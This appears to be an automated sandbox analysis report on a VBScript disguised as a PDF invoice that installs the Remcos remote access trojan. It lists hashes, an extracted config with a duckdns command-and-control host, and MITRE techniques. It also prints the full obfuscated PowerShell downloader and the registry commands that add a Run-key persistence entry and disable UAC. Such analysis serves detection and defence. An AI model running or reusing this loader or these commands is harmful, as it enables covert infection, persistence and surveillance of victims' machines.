Overview

overview

10

Static

static

1

INV_642421...df.vbs

windows7-x64

10

INV_642421...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-11-2024 09:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    INV_642421346_50136253995_SIMPLE_SK·pdf.vbs

  • Size

    33KB

  • MD5

    5c4cdb5cdd819889856451945d0e3421

  • SHA1

    90ee3b5a6ae37568bf0e8cb5769c602a851ae45a

  • SHA256

    eaaeb54bc1f3cd1f7f3b6a26b608ce60e226ae8f54d0626187c6fc42562e3d67

  • SHA512

    fd62004cd1a591cf9b1aa0ad581bad976a7f75881c025cc5e4b674d45d543104c25f8cbb853cd772e5cbbcf85873a682b64be4eae6c532921e5bfa275405af44

  • SSDEEP

    768:xFeasDMIvJVT92xONnuJOK48hZVAe/NOVVg5+rS9JL7ZZ:Heas/JuAoj5/L0S5+e9J7z

Score
10/10
remcosremotehostdiscoveryevasionpersistencerattrojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INV_642421346_50136253995_SIMPLE_SK·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Coffeylene219='Rabbinistic';;$Micromesentery='Teskere';;$Amphidisk='Ubesrgelig';;$Clerkliest='Cabinets';;$Mucopolysaccharide=$host.Name;function Forepale($Aminoaciduria){If ($Mucopolysaccharide) {$Bugserende=4} for ($Coffey=$Bugserende;;$Coffey+=5){if(!$Aminoaciduria[$Coffey]) { break };$Edderfugls+=$Aminoaciduria[$Coffey];$Salted='Wibroe'}$Edderfugls}function Guardhouse($Uforstilt){ .($Andenhaandsvidens) ($Uforstilt)}$Bulnende221=Forepale ' angn Cr.eInduTRau..TrusW';$Bulnende221+=Forepale 'Pi neSamlBLsniCPrerLE uliIndpE monn Undt';$lgeattesten=Forepale 'kaurMSammoP cuzMe aiRepulEnsel ondaf,ll/';$Dephlegm=Forepale 'Kon TneurlPants aad1Stud2';$Diddlers='porp[N bbnCeleeEst t Mon.GanaSb eceOpmur SmevForsi NonCHjemEToo,PArgeO UneiSk,hNAfsvtFr em iocaTilhN UloaPancgd.agERegir Pol]Repe:Po e:Ac osVvr E EnkCHalvUSgneRimpaiu.neT PseyN nopTetrr Esto PhoTM rpo P,oc iddoNatilImmi= ,nr$ SwaDMikrE Et.pSkodH LanLP,aceJordGDansm';$lgeattesten+=Forepale 'Ku k5Fres.Thec0Abri Bowe(AntiW Choi undnKirkdDosmoSkolwStotsMell ReasNDybdT Pem Skov1 bed0 tvi.Lur 0B,av;Unpl LnesW,reviStilnAns 6paci4 Pro; Ve. StaxAvis6Godt4Atox;Opko FlisrFancv plu:Cu m1 Enf3Riss1 St .Des.0Skum)men UnimG HimeFlexc aadkNedsot,rm/Tric2 ass0Klo 1 er0,ell0 nom1Hoc 0 Ov 1Ordr AttrFU soi VogrBesheOptlfsensoHapaxUnru/ eto1 App3Mi i1 Sut.Urne0';$Ddsstraffe188=Forepale 'Ca dU ,laS Ho eMusarUnas-Her A ngeGDublEPea.NHo,ot';$Podarthral=Forepale 'Kos hVaretDuctt akpStersOsci: V.j/Reno/Idyld A.orCalui D.kvS maeCauc.Unv gSlkkoTafloTamggHo el Tr eLola.BillcMoneo PotmStej/ Micu SkacSkaf?Barye SacxS.agpDri oChlorUheltSpec=PobbdTomao T rwGrenn Bi lNondo B,eaH thdSeri&Parai aladRest=Vves1Longs O yXReuso icrJRygd8 Tidk r aaBaby8IoniO RepPRefrdUn v4 U mHTra,5RimfJCo.yLSponA ZeszL kt-BlafCConsl EntbIndbH bes7 Supn U r8fert3retrcPathgosmaTfi,kgFrdiK';$Tidsalders=Forepale 'Buck>';$Andenhaandsvidens=Forepale ' deti croEQueeX';$Helnode='congolese';$Nyskabes='\Liparomphalus.Reg';Guardhouse (Forepale 'En e$MotoG limlNi iOGodkBScalaUntrLMarg:Gaars LunpJubiaSaddtTsarH AfsYNemee nmMTenuaBeau=Sten$S,lue SufnHungvTatl:ClauaFun Pmis.P S.gDLatiaRr rTCoobAFo s+Ydmy$DagsNdrivY KomS NecKBeglAVimfbCircePoess');Guardhouse (Forepale ' .ps$CrabgExcuL.oldo.onmb eurAVisilConv:glumkW edAAshiRJaegAQ izmSprlBreacOPerelP olA A rGDormE S.jNMa eSHver2Assu3 Sem5Torn= rbe$.ctiP DodOChe.dEgreaTaberNonrt BehHTrinRPopuALuguLForr.LeessDavip aslLf liiRefoTUn a(A go$ FesT.ateiR.ladN nas .neaP opL efdPicreLse,RSyvas.yna)');Guardhouse (Forepale $Diddlers);$Podarthral=$Karambolagens235[0];$Aftnende=(Forepale 'Subj$ spiGCdmbl.areOD noBVandaP rclHusb:ReenMSwizuUmptl Ap T E.tiIn,eLTffeAUdpoYIndhE Fi r.rhe=trihNMaj.eSna W Tv -S.rioTramB FraJBinoeDun CCommTSide TystSMellYNonpSJokuT.vanEFngsmPard.s ov$.araBLse UCe tLN.nanO,erezyzzn MicdImmiEOval2be.g2Mini1');Guardhouse ($Aftnende);Guardhouse (Forepale 'Aris$SammMStenu ShelC ictGr.siI itl MinauntayMetaeIndtr S.i. xtrHSchneDansaProcdUnmeeOsm rP.ezsHood[Sydf$SulfDtingdR imsR gisRosatJourrQueeaArmofUrlafIndie Ur.1Komi8Pand8 nl]Cap,=Freg$ ontl StegKnaceFungaCirctUnaptDaadeTilssjeoptDuskeRe sn');$Unfoilable=Forepale 'P,ly$For.Mnat uIrralAnbetAutoi harlsal,aS ityDi jeMatarPree.Ve kDKnivoJvnfw,ocknClotlBystoHulkaRivudSno,FT mbilgnil F,ee Uni( lka$Eq iPKlago LocdDelia Attr Strt R th D.arPrecaSupelTuri,F.rd$ KnoT SkiasammnK ektDy.aa Gesl RadiP.ltzRee.iJohanKarygSnobnPri.e rilsUdspsPend)';$Tantalizingness=$Spathyema;Guardhouse (Forepale 'Flum$SkarGcondlCir,O R dbAnv a RetLO er: eakvSalaRNatilSyltE Smin oardVen.ERygrSSour= Pin(V,riT DroEGlamSDe,utClos-Agg.PPnsea ootMandh Dag Sniv$Sug TS iva M,dn ElhtSto a TimLUdstIScriZTykti TroN tylG Z mNSofieKvals.ddasfl s)');while (!$Vrlendes) {Guardhouse (Forepale 'Ydel$unaugU.pflAr eoPrecbEn gaDdsdlFrue:BeskaSilinSus nC uta evebChaneDrifl pei=Hol $PlybDHosta DuscOvert namyYa nl') ;Guardhouse $Unfoilable;Guardhouse (Forepale 'RaasSIronTPragaKameR ulsTPort- ummSMindLHemaEVa,oEAmphPSila Di.e4');Guardhouse (Forepale ' Fa $KberGBeraLPos ODru.BErota inslIndv:Forev fter TitLWhiseK rnNSjofDHoveE UdsSV gg=Puni(VaabT TryEUnivSVariT and-PretPCassaHolotMe,ch Man Goo$Tromt TamaSensnUnprT Liga RapL BlaISvedZSubpi ,tynAut.gBramN An ELumbSVa is Nos)') ;Guardhouse (Forepale 'e,an$Thigg eriLCol.OLev,BYoruaFiltlNone: VeikTorsEBrair M.lcTitbH RooU EosNBankKExul=Rags$Ap,pGSlutlT opO,hilbIncaal dilThyr:GenbbRdseoGru WMiniDdegal KonEre cRG.ypi FllZMultaA.glTMiliIMetaOImpeN ar sTrua+Gise+Cran%Tapi$ PatKaminA ilkR ampa.ausmBolsbOutbOlittL Yv AK rtgUnsuEOastnN.poSP iv2Ungi3Hind5Llen. ComCTri OFemtuUndenTandt') ;$Podarthral=$Karambolagens235[$Kerchunk]}$Lgeerklringer=284242;$Rhyparography=31619;Guardhouse (Forepale ' Skr$UdloGPlutLDifbOKonsBGazuarecoLSpyd:NedidTra,YPrerN isA OutS uppTSchoiA fdEBeboR KatNRittECanaSBota1Brug9Jig,7Stab Ra d=An i Su,sGVikaEBespT Ata-Vas CT eroAgomn,ociTAeg,ESubcNMumitUnbr Ary$HenstP leAdownn HazTBuggA nselGu ai mniz.prrIJan n Ga,GsagsnEscoeParaSNonss');Guardhouse (Forepale 'Deci$ SergCelll,orloMonrbForsa.astlRepa: S.nD anr.eflvO,ereBeresMarg1Rub 6Traf5A,ne Tra.= Cot vak[Dri S R.gyMlkesSucctPou,eSpelmDidr.OlieCMangoUntinEpi.vEng eBoflrSemitAr e]Reci:Advi:flosFD urrT.nko StrmliveBTet,a F ms PoleClob6Post4Ga aSForptFurarRensiCeden LepgTalm( oud$OverDin.ey DemnFettaUnensPalatGle.i Bi eFolkrFl tnSk.leAntasSa k1Peam9 He 7 eff)');Guardhouse (Forepale 'Repe$EntrgFjerlArtioScapbsystAfortLP ei:LindskosmtHrderClonR pro Kkke= tis Lor.[Bis S ImbyKnausS.ektDybee DodmAmei.EvertgodkEOpgaxDifftSpol.A apeTaveNstyrC Ur o LukdUndeiRgernSpregNonf]Vejb:Nost:RingaSe eSPrimCforbi LerIGive.Ver g angEAndetInteSSta tOphiRflasI,eron So,gDeli( Co $CoapdCokeRFinavFljmePligs ro1 E d6 Ful5Defu)');Guardhouse (Forepale 'Retr$ St GP anlGlosOUg eB BveAUd.alHigh: Muta TidnForkiGlo,ECeletRdeh=Hygg$Nonas,eglTbushR hylr Sp . SlesHistUM,sebparasE.ghtSwanRRefuiOvernKalkG uta(Fav,$PoeslSubcGcr zE SapEkod RZ chkForsLBaneRaneriO alnMuregCondetrirrSn i, ebe$AbraR SubhTaury,eroPMicrAIrreR binoEquiGBearrNon ATun,pNeutHLdreYF em)');Guardhouse $Aniet;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2068
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Coffeylene219='Rabbinistic';;$Micromesentery='Teskere';;$Amphidisk='Ubesrgelig';;$Clerkliest='Cabinets';;$Mucopolysaccharide=$host.Name;function Forepale($Aminoaciduria){If ($Mucopolysaccharide) {$Bugserende=4} for ($Coffey=$Bugserende;;$Coffey+=5){if(!$Aminoaciduria[$Coffey]) { break };$Edderfugls+=$Aminoaciduria[$Coffey];$Salted='Wibroe'}$Edderfugls}function Guardhouse($Uforstilt){ .($Andenhaandsvidens) ($Uforstilt)}$Bulnende221=Forepale ' angn Cr.eInduTRau..TrusW';$Bulnende221+=Forepale 'Pi neSamlBLsniCPrerLE uliIndpE monn Undt';$lgeattesten=Forepale 'kaurMSammoP cuzMe aiRepulEnsel ondaf,ll/';$Dephlegm=Forepale 'Kon TneurlPants aad1Stud2';$Diddlers='porp[N bbnCeleeEst t Mon.GanaSb eceOpmur SmevForsi NonCHjemEToo,PArgeO UneiSk,hNAfsvtFr em iocaTilhN UloaPancgd.agERegir Pol]Repe:Po e:Ac osVvr E EnkCHalvUSgneRimpaiu.neT PseyN nopTetrr Esto PhoTM rpo P,oc iddoNatilImmi= ,nr$ SwaDMikrE Et.pSkodH LanLP,aceJordGDansm';$lgeattesten+=Forepale 'Ku k5Fres.Thec0Abri Bowe(AntiW Choi undnKirkdDosmoSkolwStotsMell ReasNDybdT Pem Skov1 bed0 tvi.Lur 0B,av;Unpl LnesW,reviStilnAns 6paci4 Pro; Ve. StaxAvis6Godt4Atox;Opko FlisrFancv plu:Cu m1 Enf3Riss1 St .Des.0Skum)men UnimG HimeFlexc aadkNedsot,rm/Tric2 ass0Klo 1 er0,ell0 nom1Hoc 0 Ov 1Ordr AttrFU soi VogrBesheOptlfsensoHapaxUnru/ eto1 App3Mi i1 Sut.Urne0';$Ddsstraffe188=Forepale 'Ca dU ,laS Ho eMusarUnas-Her A ngeGDublEPea.NHo,ot';$Podarthral=Forepale 'Kos hVaretDuctt akpStersOsci: V.j/Reno/Idyld A.orCalui D.kvS maeCauc.Unv gSlkkoTafloTamggHo el Tr eLola.BillcMoneo PotmStej/ Micu SkacSkaf?Barye SacxS.agpDri oChlorUheltSpec=PobbdTomao T rwGrenn Bi lNondo B,eaH thdSeri&Parai aladRest=Vves1Longs O yXReuso icrJRygd8 Tidk r aaBaby8IoniO RepPRefrdUn v4 U mHTra,5RimfJCo.yLSponA ZeszL kt-BlafCConsl EntbIndbH bes7 Supn U r8fert3retrcPathgosmaTfi,kgFrdiK';$Tidsalders=Forepale 'Buck>';$Andenhaandsvidens=Forepale ' deti croEQueeX';$Helnode='congolese';$Nyskabes='\Liparomphalus.Reg';Guardhouse (Forepale 'En e$MotoG limlNi iOGodkBScalaUntrLMarg:Gaars LunpJubiaSaddtTsarH AfsYNemee nmMTenuaBeau=Sten$S,lue SufnHungvTatl:ClauaFun Pmis.P S.gDLatiaRr rTCoobAFo s+Ydmy$DagsNdrivY KomS NecKBeglAVimfbCircePoess');Guardhouse (Forepale ' .ps$CrabgExcuL.oldo.onmb eurAVisilConv:glumkW edAAshiRJaegAQ izmSprlBreacOPerelP olA A rGDormE S.jNMa eSHver2Assu3 Sem5Torn= rbe$.ctiP DodOChe.dEgreaTaberNonrt BehHTrinRPopuALuguLForr.LeessDavip aslLf liiRefoTUn a(A go$ FesT.ateiR.ladN nas .neaP opL efdPicreLse,RSyvas.yna)');Guardhouse (Forepale $Diddlers);$Podarthral=$Karambolagens235[0];$Aftnende=(Forepale 'Subj$ spiGCdmbl.areOD noBVandaP rclHusb:ReenMSwizuUmptl Ap T E.tiIn,eLTffeAUdpoYIndhE Fi r.rhe=trihNMaj.eSna W Tv -S.rioTramB FraJBinoeDun CCommTSide TystSMellYNonpSJokuT.vanEFngsmPard.s ov$.araBLse UCe tLN.nanO,erezyzzn MicdImmiEOval2be.g2Mini1');Guardhouse ($Aftnende);Guardhouse (Forepale 'Aris$SammMStenu ShelC ictGr.siI itl MinauntayMetaeIndtr S.i. xtrHSchneDansaProcdUnmeeOsm rP.ezsHood[Sydf$SulfDtingdR imsR gisRosatJourrQueeaArmofUrlafIndie Ur.1Komi8Pand8 nl]Cap,=Freg$ ontl StegKnaceFungaCirctUnaptDaadeTilssjeoptDuskeRe sn');$Unfoilable=Forepale 'P,ly$For.Mnat uIrralAnbetAutoi harlsal,aS ityDi jeMatarPree.Ve kDKnivoJvnfw,ocknClotlBystoHulkaRivudSno,FT mbilgnil F,ee Uni( lka$Eq iPKlago LocdDelia Attr Strt R th D.arPrecaSupelTuri,F.rd$ KnoT SkiasammnK ektDy.aa Gesl RadiP.ltzRee.iJohanKarygSnobnPri.e rilsUdspsPend)';$Tantalizingness=$Spathyema;Guardhouse (Forepale 'Flum$SkarGcondlCir,O R dbAnv a RetLO er: eakvSalaRNatilSyltE Smin oardVen.ERygrSSour= Pin(V,riT DroEGlamSDe,utClos-Agg.PPnsea ootMandh Dag Sniv$Sug TS iva M,dn ElhtSto a TimLUdstIScriZTykti TroN tylG Z mNSofieKvals.ddasfl s)');while (!$Vrlendes) {Guardhouse (Forepale 'Ydel$unaugU.pflAr eoPrecbEn gaDdsdlFrue:BeskaSilinSus nC uta evebChaneDrifl pei=Hol $PlybDHosta DuscOvert namyYa nl') ;Guardhouse $Unfoilable;Guardhouse (Forepale 'RaasSIronTPragaKameR ulsTPort- ummSMindLHemaEVa,oEAmphPSila Di.e4');Guardhouse (Forepale ' Fa $KberGBeraLPos ODru.BErota inslIndv:Forev fter TitLWhiseK rnNSjofDHoveE UdsSV gg=Puni(VaabT TryEUnivSVariT and-PretPCassaHolotMe,ch Man Goo$Tromt TamaSensnUnprT Liga RapL BlaISvedZSubpi ,tynAut.gBramN An ELumbSVa is Nos)') ;Guardhouse (Forepale 'e,an$Thigg eriLCol.OLev,BYoruaFiltlNone: VeikTorsEBrair M.lcTitbH RooU EosNBankKExul=Rags$Ap,pGSlutlT opO,hilbIncaal dilThyr:GenbbRdseoGru WMiniDdegal KonEre cRG.ypi FllZMultaA.glTMiliIMetaOImpeN ar sTrua+Gise+Cran%Tapi$ PatKaminA ilkR ampa.ausmBolsbOutbOlittL Yv AK rtgUnsuEOastnN.poSP iv2Ungi3Hind5Llen. ComCTri OFemtuUndenTandt') ;$Podarthral=$Karambolagens235[$Kerchunk]}$Lgeerklringer=284242;$Rhyparography=31619;Guardhouse (Forepale ' Skr$UdloGPlutLDifbOKonsBGazuarecoLSpyd:NedidTra,YPrerN isA OutS uppTSchoiA fdEBeboR KatNRittECanaSBota1Brug9Jig,7Stab Ra d=An i Su,sGVikaEBespT Ata-Vas CT eroAgomn,ociTAeg,ESubcNMumitUnbr Ary$HenstP leAdownn HazTBuggA nselGu ai mniz.prrIJan n Ga,GsagsnEscoeParaSNonss');Guardhouse (Forepale 'Deci$ SergCelll,orloMonrbForsa.astlRepa: S.nD anr.eflvO,ereBeresMarg1Rub 6Traf5A,ne Tra.= Cot vak[Dri S R.gyMlkesSucctPou,eSpelmDidr.OlieCMangoUntinEpi.vEng eBoflrSemitAr e]Reci:Advi:flosFD urrT.nko StrmliveBTet,a F ms PoleClob6Post4Ga aSForptFurarRensiCeden LepgTalm( oud$OverDin.ey DemnFettaUnensPalatGle.i Bi eFolkrFl tnSk.leAntasSa k1Peam9 He 7 eff)');Guardhouse (Forepale 'Repe$EntrgFjerlArtioScapbsystAfortLP ei:LindskosmtHrderClonR pro Kkke= tis Lor.[Bis S ImbyKnausS.ektDybee DodmAmei.EvertgodkEOpgaxDifftSpol.A apeTaveNstyrC Ur o LukdUndeiRgernSpregNonf]Vejb:Nost:RingaSe eSPrimCforbi LerIGive.Ver g angEAndetInteSSta tOphiRflasI,eron So,gDeli( Co $CoapdCokeRFinavFljmePligs ro1 E d6 Ful5Defu)');Guardhouse (Forepale 'Retr$ St GP anlGlosOUg eB BveAUd.alHigh: Muta TidnForkiGlo,ECeletRdeh=Hygg$Nonas,eglTbushR hylr Sp . SlesHistUM,sebparasE.ghtSwanRRefuiOvernKalkG uta(Fav,$PoeslSubcGcr zE SapEkod RZ chkForsLBaneRaneriO alnMuregCondetrirrSn i, ebe$AbraR SubhTaury,eroPMicrAIrreR binoEquiGBearrNon ATun,pNeutHLdreYF em)');Guardhouse $Aniet;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3600
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1416
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jagtdeltagernes% -windowstyle 1 $Thermopsis=(gp -Path 'HKCU:\Software\Kowtowing\').blomsterkummerne;%Jagtdeltagernes% ($Thermopsis)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2024
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jagtdeltagernes% -windowstyle 1 $Thermopsis=(gp -Path 'HKCU:\Software\Kowtowing\').blomsterkummerne;%Jagtdeltagernes% ($Thermopsis)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1952
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4996
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:4688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Impair Defenses

1
T1562

Disable or Modify Tools

1
T1562.001

Modify Registry

3
T1112

Credential Access

Discovery

Network Service Discovery

1
T1046

Query Registry

1
T1012

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    07baadf28da4bc333e2d504752fa85b7

    SHA1

    e9e06748136fb712def84f96398e1cf699138bf1

    SHA256

    fce50cd0d28eb8756aca4e1c6299a4a54dde73a4e72f3a04a6e913730b847fa2

    SHA512

    ed8b31ba126d2b5dcf5b41c219ae5c38f5e81d8ca22a7cce71e9a26aff7303479666b81e3740f68ee3bcb8be376e63cca9705b305e217a47b637b87d619aed68

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d4ff23c124ae23955d34ae2a7306099a

    SHA1

    b814e3331a09a27acfcd114d0c8fcb07957940a3

    SHA256

    1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

    SHA512

    f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_euv5wot5.uas.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Liparomphalus.Reg
    Filesize

    411KB

    MD5

    d0e36e0d60f77c685edaed2abb7cd1a6

    SHA1

    007c81faed2a21cc78d474f0c00d43695c77d479

    SHA256

    b40bbf545853f3a47d267307d3ce8c2981914ebe36105af352cdb2a61ee25951

    SHA512

    7c137b945b818cc70a9d4848b49c64ba2319383d8e3b5dfd085adc1d0e8a1fa9c5116b0bae089cae9afda35c5bad542b7c5d74dc71361dbeb1dffd8266775692

    Download Submit

  • memory/1416-62-0x0000000000C00000-0x0000000001E54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2068-15-0x00007FF83CB50000-0x00007FF83D611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2068-20-0x00007FF83CB50000-0x00007FF83D611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2068-21-0x00007FF83CB50000-0x00007FF83D611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2068-24-0x00007FF83CB50000-0x00007FF83D611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2068-19-0x00007FF83CB53000-0x00007FF83CB55000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2068-16-0x00007FF83CB50000-0x00007FF83D611000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2068-5-0x00000229327E0000-0x0000022932802000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2068-4-0x00007FF83CB53000-0x00007FF83CB55000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3600-28-0x00000000059F0000-0x0000000005A56000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3600-45-0x00000000074B0000-0x0000000007546000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3600-29-0x0000000005AD0000-0x0000000005B36000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3600-41-0x0000000006200000-0x000000000621E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3600-42-0x0000000006230000-0x000000000627C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3600-43-0x0000000007A70000-0x00000000080EA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3600-44-0x0000000006770000-0x000000000678A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3600-39-0x0000000005BC0000-0x0000000005F14000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3600-46-0x0000000007440000-0x0000000007462000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3600-47-0x00000000086A0000-0x0000000008C44000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3600-27-0x00000000058D0000-0x00000000058F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3600-49-0x0000000008C50000-0x000000000AFEB000-memory.dmp

    Filesize

    35.6MB

    Download

  • memory/3600-26-0x0000000005260000-0x0000000005888000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3600-25-0x0000000004BC0000-0x0000000004BF6000-memory.dmp

    Filesize

    216KB

    Download